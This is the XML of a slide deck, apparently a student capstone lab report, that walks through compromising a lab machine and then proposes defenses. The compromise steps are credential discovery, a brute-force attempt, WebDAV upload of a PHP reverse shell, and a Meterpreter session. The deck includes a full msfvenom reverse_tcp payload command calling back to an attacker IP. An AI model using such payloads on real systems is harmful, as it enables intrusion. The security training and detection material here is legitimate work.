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41.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79"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Roboto Medium" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId26"/>
      <p:bold r:id="rId27"/>
      <p:italic r:id="rId28"/>
      <p:boldItalic r:id="rId29"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId30"/>
      <p:bold r:id="rId31"/>
      <p:italic r:id="rId32"/>
      <p:boldItalic r:id="rId33"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId34"/>
      <p:bold r:id="rId35"/>
      <p:italic r:id="rId36"/>
      <p:boldItalic r:id="rId37"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black" panose="020B0604020202020204" charset="0"/>
      <p:bold r:id="rId38"/>
      <p:boldItalic r:id="rId39"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto"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079959-D9A6-49A7-BC02-231100A66CFA}">
  <a:tblStyle styleId="{97079959-D9A6-49A7-BC02-231100A66C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52"/>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1778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dirty="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dirty="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dirty="0">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dirty="0">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dirty="0">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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="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dirty="0"/>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dirty="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dirty="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dirty="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dirty="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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Unrestricted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Upload of File with Dangerous Type</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>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600" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Kali Linux crafts a reverse shell PHP file utilizing Msfvenom. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Ex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>-p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/ meterpreter/ reverse_tcp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>lhost=192.168.1.90 lport=4444 &gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>&gt;</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63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3369672"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600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Achievements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1200" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Because we have access to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>WebDAV </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>directory, we are able to implant shell.php on the target system.</a:t>
            </a:r>
            <a:endParaRPr sz="16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p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5649950" y="1480575"/>
            <a:ext cx="3412274" cy="31542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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Command Shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>in Accessible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>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lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Kali Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>sets up a listener on Port 4444 to activate a Meterpreter session when target shell.php on machine .105 comes alive.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="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0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Roboto Light"/>
                  <a:ea typeface="Roboto Light"/>
                  <a:cs typeface="Roboto Light"/>
                  <a:sym typeface="Roboto Light"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" sz="2100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>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0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Roboto Light"/>
                  <a:ea typeface="Roboto Light"/>
                  <a:cs typeface="Roboto Light"/>
                  <a:sym typeface="Roboto Light"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" sz="2100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>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42" name="Google Shape;1142;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3436578" y="1480625"/>
            <a:ext cx="2428500" cy="3154200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182875" tIns="182875" rIns="182875" bIns="182875" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Achievements</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Once connection is achieved we can then begin searching the Capstone filesystem in Linux, using the command &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>&gt; in Meterpreter.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Roboto Light"/>
                  <a:ea typeface="Roboto Light"/>
                  <a:cs typeface="Roboto Light"/>
                  <a:sym typeface="Roboto Light"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" sz="2100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>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572" y="1465964"/>
            <a:ext cx="3486614" cy="3183421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22638063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dirty="0"/>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dirty="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latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="3969327"/>
            <a:ext cx="8409300" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Here, the attacking Kali machine .90 is seen contacting Capstone .105 about noon on 11/6/21.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51" y="753686"/>
            <a:ext cx="8409300" cy="320077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dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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72" name="Google Shape;1172;p66"/>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2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="3979718"/>
            <a:ext cx="8409300" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Closer to noon on 11/6/21, the attacking machine was able to contact the Capstone secret_folder by http GET request, revealing user credentials and methods used to further access WebDAV in the system.</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49" y="691375"/>
            <a:ext cx="8409301" cy="331562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dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>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82" name="Google Shape;1182;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1533125"/>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3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="3969327"/>
            <a:ext cx="8409300" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A substantial amount of errors occur in lieu of the brute force attack conducted by Kali, due to the return of 401 Unauthorized codes during an attempt to crack the password using a wordlist.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49" y="721110"/>
            <a:ext cx="4197217" cy="32927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567" y="721110"/>
            <a:ext cx="4212083" cy="329275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dirty="0">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2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="3969327"/>
            <a:ext cx="8409300" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Focusing closely on the attack window, we can zero in on the WebDAV directories accessed. Specifically related files such as password, and the activation of reverse TCP shell.php, which opened a pipeline from Capstone back to the attacker (Kali), ultimately compromising the system.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50" y="707897"/>
            <a:ext cx="8409300" cy="328373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dirty="0"/>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dirty="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dirty="0"/>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Configure a SIEMs alert to count attempts to access a destination port from external source IPs.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lang="en" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Perform a study on “normal” activity and set an alert threshhold for 50% over maximum.</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209" name="Google Shape;1209;p70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1545228"/>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600" dirty="0" smtClean="0"/>
              <a:t>Scanning one’s own system will determine what ports are open for various machines on the network. The best defense against port scans is to maintain a good firewall.</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>For example, in Linux Uncomplicated Firewall (UFW software), blocking all TCP traffic to port 4444 would appear as follows: &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo ufw deny 4444/tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pP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31" y="2155902"/>
            <a:ext cx="2200932" cy="160577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dirty="0"/>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A large number of HTTP 401 Unauthorized codes can be an indicator of a malicious actor attempting to gain access to certain files or directories.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lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>For example, when a large number of denials (15,000) exceeds a relative number of successes (5,000), consider setting an alert when failed attempts exceeds (7,500).</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1217" name="Google Shape;1217;p71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
